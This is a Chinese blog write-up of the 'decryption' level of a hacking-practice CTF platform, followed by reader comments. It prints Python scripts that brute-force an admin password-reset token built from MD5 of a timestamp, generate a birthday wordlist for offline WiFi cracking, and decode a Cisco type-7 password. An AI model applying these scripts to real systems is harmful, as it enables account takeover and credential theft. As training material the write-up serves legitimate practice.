正在阅读:

网络信息安全攻防学习平台解密关过关攻略

27,152

今天是我们网络信息安全攻防学习平台过关攻略的最后一期了,希望我的连载能给予大家帮助,当然也不希望你在看完了攻略了以后再去做题目,这样你就没有自己进行思考了,也不利于你的学习,在你进行了所有的尝试之后实在解决不了的题目再来参考攻略。

游戏地址:

http://hackinglab.sinaapp.com/index.php

解密关过关攻略

第1题:以管理员身份登录系统

补充说明:假设除了admin用户,其它用户的邮箱都可被登录获取重置密码的链接。

根据提示信息,我们无法直接得到管理员的重置连接,应该是需要破解才可以的,以下是解题过程。

我尝试重置了3次密码,然后对重置的sukey进行解密,得到如下的信息:

第1次:1417336279

第2次:1417336396

第3次:1417336446

可以发现,3次中前面的几位基本上都是一样的(1417336),所以我们可以对后3位进行遍历,来得到通关密码。

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
# Date: 2014/11/30
# Created by 独自等待
# 博客 http://www.waitalone.cn/
import requests
import hashlib

s = requests.Session()
header = {'Cookie': 'saeut=125.122.24.125.1416063016314663; PHPSESSID=45204efb16a5fba91c9159e1fe65b0e5'}
for x in xrange(615, 1000):
    pwd = hashlib.new('md5', '1417336' + str(x)).hexdigest()
    url = 'http://1.hacklist.sinaapp.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=' + pwd + '&username=admin'
    r = s.get(url, headers=header)
    if r.content != '':
        print r.content
        break
    else:
        print '正在破解中……', pwd

这里有一个技巧,这个起始的数字,一定是要大于你查出来的这个数字,这样的话会缩小范围,很快就能得到key了,如下图:

网络信息安全攻防平台

当然也有人说了,这个是利用时间戳加密得到的md5值进行碰撞得到的subkey,我也进行了测试,确实是这样的,代码如下:

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
# Date: 2014/11/30
# Created by 独自等待
# 博客 http://www.waitalone.cn/
import requests
import hashlib
import time

s = requests.Session()
header = {'Cookie': 'saeut=125.122.24.125.1416063016314663; PHPSESSID=45204efb16a5fba91c9159e1fe65b0e5'}
while True:
    pwd = hashlib.new('md5', str(int(time.time()))).hexdigest()
    url = 'http://1.hacklist.sinaapp.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=' + pwd + '&username=admin'
    r = s.get(url, headers=header)
    time.sleep(0.8)
    if r.content != '':
        print r.content
        break
    else:
        print '正在破解中……', pwd

两段代码都可以得到key,由于第1种需要解密sukey,所以推荐大家使用第2种方法,这个才是作者的真实意图!

第2题:邂逅对门的妹纸

小明想要认识对门的漂亮妹纸,但又不好意思直接去敲门,但是小明知道妹纸今年(2014年)上大三(提交wifi密码的md5 32位小写)

这一关明显考的是wifi密码破解,需要了解一些无线破解的相差知识,不过此题倒也不难,从题目中可以看出,这里的密码字典很明显是基于生日的(2014上大三),首先我们利用代码生成字典:

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
# Date: 2014/11/30
# Created by 独自等待
# 博客 http://www.waitalone.cn/
with open('pass.txt', 'a+') as dic:
    for year in range(1980, 2015):
        for mon in range(1, 13):
            for day in range(1, 32):
                print '%d%02d%02d' % (year, mon, day)
                dic.write('%d%02d%02d\n' % (year, mon, day))

然后使用此字典,破解离线wifi包,即可得到密码,如下图:

网络信息安全攻防平台

至于过关的key就是图中的密码md5 32位值,即可。

第3题:万恶的Cisco

小明入侵了某企业内网,成功的从一管理员电脑获取了某型号交换机running-config文件,发现以下密码“02070D48030F1C294940041801181C0C140D0A0A20253A3B”请你帮他破解该密码。

这一题也简单,可以在线破解,也可以使用python cisco库来破解,代码如下:

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
# Date: 2014/11/30
# Created by 独自等待
# 博客 http://www.waitalone.cn/
try:
    from cisco_decrypt import CiscoPassword
except ImportError:
    raise SystemExit('\n模块导入错误,请使用pip进行安装!')

cisco_pass = '02070D48030F1C294940041801181C0C140D0A0A20253A3B'
crack = CiscoPassword()
password = crack.decrypt(cisco_pass)
print password

很容易就得到了密码的明文,如下图:

网络信息安全攻防平台

到此为止,所有的过关题目已经写完了,看看排行榜又从第6名降到第8名了,牛人多呀,让我等小菜怎么活,求大牛带我。

网络信息安全攻防平台

目前有:14条访客评论,博主回复10

  1. 123
    2014-12-03 12:45

    大神,求破解交换机密码的在线网址

  2. Jaosn
    2015-01-11 10:49

    你好,解密关第二题是用什么软件破解离线WIFI包的?谢谢!

  3. jason
    2015-01-11 10:59

    CiscoPassword库哪有下载?找了很久都没看到啊,能否提供下,谢谢!

    • 独自等待
      2015-01-13 10:18

      库子在这里。https://pypi.python.org/pypi/cisco_decrypt/0.8.3

  4. sammy
    2015-01-14 16:56

    你好,第一题,怎么解密出每次surkey的md5值的,每次都不一样啊

    • 独自等待
      2015-01-14 18:05

      不太明白你的意思呀,你用一下第二个脚本测试一下。

  5. helo
    2015-02-15 09:40

    问下大神第一题大概跑了多少次或多久,为何我跑了半小时也没出来(用的第二个脚本)。。

    • 独自等待
      2015-02-20 18:32

      如果我没有记错的话,大概100多次好像就出来了。

  6. fighting
    2015-03-11 21:32

    咋第一题MD5值一个都没解密出来啊,求介绍一个比较好的解密MD5的网站

    • 独自等待
      2015-03-12 10:51

      cmd5.com这个比较好,其实那个题最好使用第二个脚本,把里面的cookie改成你自己的再去破解。

      • fighting
        2015-03-17 09:44

        @独自等待:谢谢,谢谢,谢谢!!!!!!!!!!!!!!!

  7. Clown
    2015-04-09 13:47

    第一题,我用当前时间戳正负200秒以内的所有时间戳生成了sukey的字典,带入到burp中爆破,并没有出答案,请问问题出在哪里呢?另外我使用php脚本,也遇到了同样的问题,返回都是空哇

    • 独自等待
      2015-04-09 14:53

      用我的python脚本不行吗?php脚本在提交请求的时候,请加上cookie信息,服务器要处理Session的。。

      • Clown
        2015-04-09 16:30

        @独自等待:使用您的第二个脚本(url有变化,已改过),跑了十几分钟也没跑出来,不知道是否是题目有所变化
        另外还有一个问题,如果只是验证sukey,重置用户名的时候输入admin (后加空格),这样在判断是否为admin的时候得到否,客户端得到链接,但是因为空格截断的原因,也会获得username=admin的链接,这同样出现的是空白页面,求解

        • 独自等待
          2015-04-09 16:44

          我再跑一次看看吧。。。测试了一下,确实发现不能像以前一样的破解得到密码了,不清楚是哪里的问题,估计题目修改过吧。

          • Clown
            2015-04-10 10:35

            @独自等待:已经解决了,应该是题目逻辑完善过了,必须先使用admin的用户名提交之后,再跑脚本才可以,像我之前虽然用admin 绕过了,但是由于服务器上并没有admin用户的重置请求,所以跑不出来,您的脚本没有问题,只不过在跑之前需要用admin提交重置请求

            • 独自等待
              2015-04-10 12:00

              嗯,我把这事给忘了,以前的题目逻辑也是这样的,只是我好久没有玩了,忘了。

  8. Clown
    2015-04-09 15:55

    我带了cookie的,用burp跑的时候也是带着cookie的,效果相同,python我没有安装requests模块,我去装下试试吧

  9. netpopok
    2015-04-15 15:47

    解密第一题,我的脚本也没跑出来,也先点重置admin密码了

  10. seo
    2015-05-07 16:30

    怎么我的回复看不到啊

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌